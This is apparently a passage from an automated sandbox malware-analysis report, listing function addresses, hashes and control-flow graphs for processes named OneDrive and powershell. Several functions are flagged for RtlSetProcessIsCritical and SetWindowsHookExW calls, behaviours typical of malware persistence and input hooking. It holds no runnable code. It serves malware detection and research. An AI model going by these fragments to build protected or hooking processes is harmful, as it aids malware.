7ff887b1c4f4-7ff887b1c4f7 806->813 828 7ff887b1c549-7ff887b1c588 call 7ff887b12630 call 7ff887b19f70 call 7ff887b14478 812->828 829 7ff887b1c58d-7ff887b1c5a2 812->829 813->623 817 7ff887b1c4fd-7ff887b1c52d call 7ff887b105c0 call 7ff887b105d0 call 7ff887b14470 813->817 823 7ff887b1c4bb-7ff887b1c4d8 call 7ff887b105c8 call 7ff887b105d0 call 7ff887b14470 815->823 824 7ff887b1c491-7ff887b1c4b6 call 7ff887b1aed0 815->824 817->656 823->656 824->656 828->656 844 7ff887b1c5a8-7ff887b1c63d call 7ff887b10ae0 call 7ff887b1aed0 829->844 845 7ff887b1c642-7ff887b1c657 829->845 844->656 845->656 857 7ff887b1c65d-7ff887b1c664 845->857 863 7ff887b1c677-7ff887b1c791 call 7ff887b17678 call 7ff887b17688 call 7ff887b17698 call 7ff887b176a8 call 7ff887b12c18 call 7ff887b176b8 call 7ff887b17688 call 7ff887b17698 857->863 864 7ff887b1c666-7ff887b1c670 call 7ff887b17668 857->864 912 7ff887b1c793-7ff887b1c797 863->912 913 7ff887b1c802-7ff887b1c811 863->913 864->863 914 7ff887b1c799-7ff887b1c7ea call 7ff887b176c8 call 7ff887b176d8 912->914 915 7ff887b1c818-7ff887b1c8b1 call 7ff887b10ae0 call 7ff887b105d8 call 7ff887b1aed0 912->915 913->915 925 7ff887b1c7ef-7ff887b1c7f8 914->925 940 7ff887b1c8b8-7ff887b1c8ba 915->940 925->913 940->656
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 79c968fdac448d39c689ba7940a73f3301486840977b3b1356a267d5209bbef9
                    • Instruction ID: 4fad0ec0a78e9d28a39336962a492d2826b636f1fee6cf9f40a2cb224321b0bb
                    • Opcode Fuzzy Hash: 79c968fdac448d39c689ba7940a73f3301486840977b3b1356a267d5209bbef9
                    • Instruction Fuzzy Hash: 19825130B5C91A8BEB98EB68845577D72E3FF98390F544579E01ED32C2DE2CAC428752
                    Function 00007FF887B11CDD Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID: r6y
                    • API String ID: 0-3142403458
                    • Opcode ID: 76abf21fd3f7d681d04effac4c48c246ba1cc43a66b19c6c6f4301b4d5e18623
                    • Instruction ID: c498e5c9304d1fb650c5f7137a905a25970db7a280c20d03948970a9c7fd6e6d
                    • Opcode Fuzzy Hash: 76abf21fd3f7d681d04effac4c48c246ba1cc43a66b19c6c6f4301b4d5e18623
                    • Instruction Fuzzy Hash: 9B511120A5D6C94FD786AB78582427A7FE6EF87255B0804FFE08DC72E3DD184846C352
                    Function 00007FF887B18916 Relevance: .5, Instructions: 473COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67231138f569764eac8e147ce237a2d1c658a0623db07a3f35375eae94c33866
                    • Instruction ID: 82a927ad8224854951408d3b389b440e7e81323154b7e3673f58bdf10a7c8c6c
                    • Opcode Fuzzy Hash: 67231138f569764eac8e147ce237a2d1c658a0623db07a3f35375eae94c33866
                    • Instruction Fuzzy Hash: ADF19430918A8D8FEBA8DF28C8957E937E2FF54350F04426AE84DC7295DB34D945CB82
                    Function 00007FF887B196C2 Relevance: .5, Instructions: 461COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 74ce60b983f677394145741859b3809b2f9de4e296816d99757daece8e4bfaf7
                    • Instruction ID: 249fa1a8c4b30d2d49156d5413f1dce5d7497404901cf8350f58c75049435180
                    • Opcode Fuzzy Hash: 74ce60b983f677394145741859b3809b2f9de4e296816d99757daece8e4bfaf7
                    • Instruction Fuzzy Hash: 4FE1A330908A8D8FEBA8DF28C8557E977E1FF64350F04426ED84DC7295CE78A944CB82
                    Function 00007FF887B13B4D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 941 7ff887b13b4d-7ff887b13c30 RtlSetProcessIsCritical 944 7ff887b13c38-7ff887b13c6d 941->944 945 7ff887b13c32 941->945 945->944
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID: CriticalProcess
                    • String ID:
                    • API String ID: 2695349919-0
                    • Opcode ID: 070290249eb8da71ce3ad989bbae07bdea45c362eaf58db9c085ce3c8fc6923a
                    • Instruction ID: eab26d67c331f6db18761eb31d5d41176d1666ec5b8229edc3845a3661ab0dba
                    • Opcode Fuzzy Hash: 070290249eb8da71ce3ad989bbae07bdea45c362eaf58db9c085ce3c8fc6923a
                    • Instruction Fuzzy Hash: F941B33180C7598FDB19DFA8D845BE97BF0FF56311F04416ED08AC3692DB68A846CB91
                    Function 00007FF887B14078 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 947 7ff887b14078-7ff887b1407f 948 7ff887b1408a-7ff887b140fd 947->948 949 7ff887b14081-7ff887b14089 947->949 952 7ff887b14189-7ff887b1418d 948->952 953 7ff887b14103-7ff887b14110 948->953 949->948 954 7ff887b14112-7ff887b1414f SetWindowsHookExW 952->954 953->954 956 7ff887b14151 954->956 957 7ff887b14157-7ff887b14188 954->957 956->957
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID: HookWindows
                    • String ID:
                    • API String ID: 2559412058-0
                    • Opcode ID: 960e0e4201f9e4a45f4307808c75b908fc4da30c1041e4c65bdf806862190fa5
                    • Instruction ID: fb2616280068e18f559c6208e6fd07cdf65177385086794103cee0188cbc1cb3
                    • Opcode Fuzzy Hash: 960e0e4201f9e4a45f4307808c75b908fc4da30c1041e4c65bdf806862190fa5
                    • Instruction Fuzzy Hash: AB310830A1CA5D8FDB18DB6C98466FD7BE1FB69321F10023ED049C3292CE64A852C7C1
                    Function 00007FF887B136CA Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 960 7ff887b136ca-7ff887b13bca 963 7ff887b13bd2-7ff887b13c30 RtlSetProcessIsCritical 960->963 964 7ff887b13c38-7ff887b13c6d 963->964 965 7ff887b13c32 963->965 965->964
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2638171307.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff887b10000_OneDrive.jbxd
                    Similarity
                    • API ID: CriticalProcess
                    • String ID:
                    • API String ID: 2695349919-0
                    • Opcode ID: adbe7263bbca8a75a58aa4763cb5d7db58b6d120d40b7958f77a113c6ce91d42
                    • Instruction ID: 2e9441ba38b0fcacfe50594fab70e53d330e52c8dd11aa406aa6eab5afa01fd5
                    • Opcode Fuzzy Hash: adbe7263bbca8a75a58aa4763cb5d7db58b6d120d40b7958f77a113c6ce91d42
                    • Instruction Fuzzy Hash: 7D31A23190CA188FDB28DB9CD845BF97BE0FF59311F14412EE09AD3692DB74A846CB91

                    Executed Functions

                    Function 00007FF887C06605 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1421011328.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bt
                    • API String ID: 0-3320995240
                    • Opcode ID: 1a601776b84b3b256488a189beae089a2dbae7ba9f205d0924143565c94c1ff8
                    • Instruction ID: 5c95a6299df6c9a749d3f1b96cdbc64147748489f296930d9faaf68b0fb3f402
                    • Opcode Fuzzy Hash: 1a601776b84b3b256488a189beae089a2dbae7ba9f205d0924143565c94c1ff8
                    • Instruction Fuzzy Hash: 12D10232D5DA8A8FEB55DB6888555BD7BF2FF163A4B0801FED04DD7093DA18A805C382
                    Function 00007FF887A1E380 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1419980018.00007FF887A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A1D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887a1d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: xr}
                    • API String ID: 0-952569658
                    • Opcode ID: 68b49e31153d13382dbe1a45a8ce6599be17ce882c3a20d3bfe0dadaba9b7bd3
                    • Instruction ID: e2097bdf915f5120639174293cbdc8f6c68caca2e2b4270600d2b918d7da544d
                    • Opcode Fuzzy Hash: 68b49e31153d13382dbe1a45a8ce6599be17ce882c3a20d3bfe0dadaba9b7bd3
                    • Instruction Fuzzy Hash: 8A41247080DBC44FE75A8B38A8469623FF0FF56365B1501EFD089CB1A3D625A806C7A2
                    Function 00007FF887B39758 Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1420446595.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c30ac9f3913d9669e5a18b9e6cb4fcac0a2e3d6ae54b06fc6599c984b9d15f9d
                    • Instruction ID: 9c2955461661a76b88d6fe3a664dee7e9d716ccbb3d498a7832bfcba1bfe10b4
                    • Opcode Fuzzy Hash: c30ac9f3913d9669e5a18b9e6cb4fcac0a2e3d6ae54b06fc6599c984b9d15f9d
                    • Instruction Fuzzy Hash: 4331EB7191CB489FDB589F5CA80A6FD7BE1FBA9711F00412FE449D3252DA30A855CBC2
                    Function 00007FF887B3A62C Relevance: .1, Instructions: 102COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1420446595.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 968b9ae9f1e046025997db9d57d570127e6efe73a0e40ba82c4fedca18b88c30
                    • Instruction ID: 55ee6f35949551d6bf6fb780a56297595a115d0dccb894667fac6d84152f1671
                    • Opcode Fuzzy Hash: 968b9ae9f1e046025997db9d57d570127e6efe73a0e40ba82c4fedca18b88c30
                    • Instruction Fuzzy Hash: E721F83190CB4C4FEB59DFAC9C4A7E97BF1EB96321F04416BD048C3152DA74945ACB92
                    Function 00007FF887B333B5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1420446595.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                    • Instruction ID: 4b87c7a2925cab0916395990dd5a602cba74e19dd1bc504da5f8eba151e5aabd
                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                    • Instruction Fuzzy Hash: E201677115CB0D4FDB48EF0CE451AAAB7E0FB99364F10056DE58AC3651DA36E882CB46
                    Function 00007FF887C0414D Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1421011328.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aaf101f28dfb7d733a706c5e481005ef77988ef7f7c6a48fa9ff637a18778306
                    • Instruction ID: c11517783bfa4d1c44da376aab23e29cb0233f78f46dbba88664f98174fa7d28
                    • Opcode Fuzzy Hash: aaf101f28dfb7d733a706c5e481005ef77988ef7f7c6a48fa9ff637a18778306
                    • Instruction Fuzzy Hash: 19F09A32A4C9448FD768EA4CE4404E873E1FF5536072100BAE02DC71A3CA2AEC40C781
                    Function 00007FF887C04400 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1421011328.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14eecb45b20d017c04ec6a462fcf49abf6a1bc5bf74e9c7748c5213d0f7d30b8
                    • Instruction ID: 41682a9f97a5e82d44d899414ebe83c9664f30287399c7920f3713cc9d14daf4
                    • Opcode Fuzzy Hash: 14eecb45b20d017c04ec6a462fcf49abf6a1bc5bf74e9c7748c5213d0f7d30b8
                    • Instruction Fuzzy Hash: C7F0BE31A4C9448FD754EB8CE4404AC77F1FF0532171100F6E019CB153CA2AAC40C780
                    Function 00007FF887C041D1 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1421011328.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                    • Instruction ID: 87685e61101e1224cf1f86d99133cf01b494ea5b644ec022a66fa70fcc0156a4
                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                    • Instruction Fuzzy Hash: 69E01A31B4C8089FDB68DA0CE0409EE73E2FB9936176101BBD14EC7561CA22ED51CBC0
                    Function 00007FF887B3A2AA Relevance: .0, Instructions: 23COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000002.00000002.1420446595.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a0268fbcd6403e823ceadcf04dd355c6ce913fb01d7a34fec587dc39fb80481e
                    • Instruction ID: debdeee6d58c808d44d54c07e6f632370b28baf524db8d070642248ac929c720
                    • Opcode Fuzzy Hash: a0268fbcd6403e823ceadcf04dd355c6ce913fb01d7a34fec587dc39fb80481e
                    • Instruction Fuzzy Hash: 4BE04635804A4C8F8B48EF18C8498E97BA0FF68305B1102ABE80DC3120DB71DA58CBC2

                    Non-executed Functions

                    Function 00007FF887B38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.1420446595.00007FF887B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff887b30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: K_^4$K_^7$K_^F$K_^J
                    • API String ID: 0-377281160
                    • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                    • Instruction ID: aec026dcd16201245b71d164863561d43e2eff9d8da581b550697b553bf90853
                    • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                    • Instruction Fuzzy Hash: B2215E7761C52A5EDB11BFBCB8446D93BA0EF982B434502B3D19CDB013EE18708786D1

                    Executed Functions

                    Function 00007FF887BD660A Relevance: 2.9, Strings: 2, Instructions: 439COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1526250459.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887bd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv$X7uc
                    • API String ID: 0-201767115
                    • Opcode ID: e61fca29e0ae46c7de3d9d3b36134f2418dde4d1f9a2abf0e675294d6932c8a8
                    • Instruction ID: 084ddf40ceccf6f0a19ee02eb39b2a711ef7e38324b8a2939852dbb3d1bd2a2e
                    • Opcode Fuzzy Hash: e61fca29e0ae46c7de3d9d3b36134f2418dde4d1f9a2abf0e675294d6932c8a8
                    • Instruction Fuzzy Hash: 18D10332D4DACA8FE7659B6858196B97FB2FF16398B0801FFE44DC7093D919A805C342
                    Function 00007FF887B0644D Relevance: 1.9, Strings: 1, Instructions: 691COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1525369041.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6y
                    • API String ID: 0-1547487790
                    • Opcode ID: db8d6b51055a7434ffcbadf846b4885c3430253d4da3f5c132bb58143eb66cb7
                    • Instruction ID: e9affc8aeae6caf3c7ec69b23ec5d521d6efbcaaa11884c9fbec918aafe0924d
                    • Opcode Fuzzy Hash: db8d6b51055a7434ffcbadf846b4885c3430253d4da3f5c132bb58143eb66cb7
                    • Instruction Fuzzy Hash: 75D18D30A18A4E8FDB88DF58C455AED7BF2FF69344F14416AD40DE7296CA34E881CB81
                    Function 00007FF8879EE540 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1524517924.00007FF8879ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8879ED000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff8879ed000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: xr}
                    • API String ID: 0-952569658
                    • Opcode ID: c3c4b4ed8ede48c78df01a40259a04ef7505a35b3fe6328629085ce556a30d4b
                    • Instruction ID: 890d0d63520bca607f7da465834e9ec6f8a2895906366bdf2dd37651066192cd
                    • Opcode Fuzzy Hash: c3c4b4ed8ede48c78df01a40259a04ef7505a35b3fe6328629085ce556a30d4b
                    • Instruction Fuzzy Hash: F941D03140DBC45FE7568B3C9C459563FF0FF56260B1906DFD088CB1A3EA69A84AC7A2
                    Function 00007FF887B09750 Relevance: .1, Instructions: 143COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1525369041.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 685f9c66958acd0190d92d30303017ddf0b3d65d5857e2a2ad12a9e3ae4b755f
                    • Instruction ID: a0ab382f925ee40830a30cf8d79bd903fafb38c055c68ebd525cc8632548e438
                    • Opcode Fuzzy Hash: 685f9c66958acd0190d92d30303017ddf0b3d65d5857e2a2ad12a9e3ae4b755f
                    • Instruction Fuzzy Hash: 23411A7190DB884FEB19DF5C9C0A6B97FF1FB65710F0441AFD04993292CA64A819CBC2
                    Function 00007FF887B0A49C Relevance: .1, Instructions: 99COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1525369041.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f2d23b6a3837de8a4f67ff6488f387045c0a4af9caf518343a0134b43e30433
                    • Instruction ID: 89e10bac6caba844af4c7239aebc280843fb2f2081401eece32fcf23b5aba626
                    • Opcode Fuzzy Hash: 5f2d23b6a3837de8a4f67ff6488f387045c0a4af9caf518343a0134b43e30433
                    • Instruction Fuzzy Hash: E121263190CB4C4FEB59DBAC9C4A7E97FF0EB96321F04416BD448C3152DA74A80ACB92
                    Function 00007FF887B033B5 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1525369041.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction ID: f5810d3acb45815ee33ea786700f3b8f266a242e7a1079bfbfe35fa9d9365509
                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                    • Instruction Fuzzy Hash: 0101677115CB0C4FDB48EF0CE451AA9B7E0FB99364F10056DE58AC3651DA36E882CB46
                    Function 00007FF887BD414D Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1526250459.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887bd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16b10f13629354ded38138fad396db8f78f858c755b546fe8a0f79b1dcb0a6b5
                    • Instruction ID: dcb62a2c21790973e9f486b12be64d15645f059227ffbec4a848c135b45c751c
                    • Opcode Fuzzy Hash: 16b10f13629354ded38138fad396db8f78f858c755b546fe8a0f79b1dcb0a6b5
                    • Instruction Fuzzy Hash: B3F09A32A4C9448FD6A8EA4CE4404A87BF1FF54370B2500BAE06DC71A3CA2AEC40C741
                    Function 00007FF887BD4400 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1526250459.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887bd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 541e67a6d97188da42a149486de6fcb8ed8c61d47e313ac617cf2e245ff9f953
                    • Instruction ID: 7d99ea6b23837e3bc872069d49f2e0dcc85844357d9cef6c1d33509113ea0c15
                    • Opcode Fuzzy Hash: 541e67a6d97188da42a149486de6fcb8ed8c61d47e313ac617cf2e245ff9f953
                    • Instruction Fuzzy Hash: 9BF0BE31A4C9448FD794EB4CE4484AC77F0FF0436071100F6E059CB153CA2AAC80CB40
                    Function 00007FF887BD41D1 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.1526250459.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887bd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                    • Instruction ID: 4da22ec1436e16838fcad258ba99593d65fc8e47dcbed829a43dc2075cef3313
                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                    • Instruction Fuzzy Hash: C0E01A31B4C8089FDAA8DA0CE0409AD7BE2FB9837172101B7D14EC7562CA32EC51CB80

                    Non-executed Functions

                    Function 00007FF887B08BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1525369041.00007FF887B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ff887b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                    • API String ID: 0-2388461625
                    • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                    • Instruction ID: fd72efca6238f88fd58c9250b5cae536bea956fbd41cab5aea89c9f9ababf7bb
                    • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                    • Instruction Fuzzy Hash: 0521D773A185254AC7117BFCBC516D87B81EF543B834501F3E718DF513DA18A48B8683

                    Executed Functions

                    Function 00007FF887C06483 Relevance: 2.9, Strings: 2, Instructions: 398COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv$ bv
                    • API String ID: 0-2549666969
                    • Opcode ID: f59f0931e042169b0d11a66a9100dddab0ba1ce981da73b4cf6f0d31a335a4fb
                    • Instruction ID: b99675f70af9c59f64a8470c560631e89fcf8802891d2330a6c988b631b46fc6
                    • Opcode Fuzzy Hash: f59f0931e042169b0d11a66a9100dddab0ba1ce981da73b4cf6f0d31a335a4fb
                    • Instruction Fuzzy Hash: 55C10131D4DA8A8FE765DF6898195B97BF2FF12394B0801FED44DDB093DA18A805C392
                    Function 00007FF887C064CC Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv
                    • API String ID: 0-1878758691
                    • Opcode ID: 2a71f1b7feb931e9a5ce3b3c28c0a274df6d80f1b5f65ac09c44de4898301d92
                    • Instruction ID: 6ae5bb6b75f9a6d893892d8f6840938fe5bb27f5a154e0535bcc521913a4bf1e
                    • Opcode Fuzzy Hash: 2a71f1b7feb931e9a5ce3b3c28c0a274df6d80f1b5f65ac09c44de4898301d92
                    • Instruction Fuzzy Hash: AB81D221D4DA8A8FE7A5DF68946567D7AF2FF02794B5801BEC40DDB0C3DE18A804C381
                    Function 00007FF887C06660 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1682170430.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff887c00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: bv
                    • API String ID: 0-1878758691
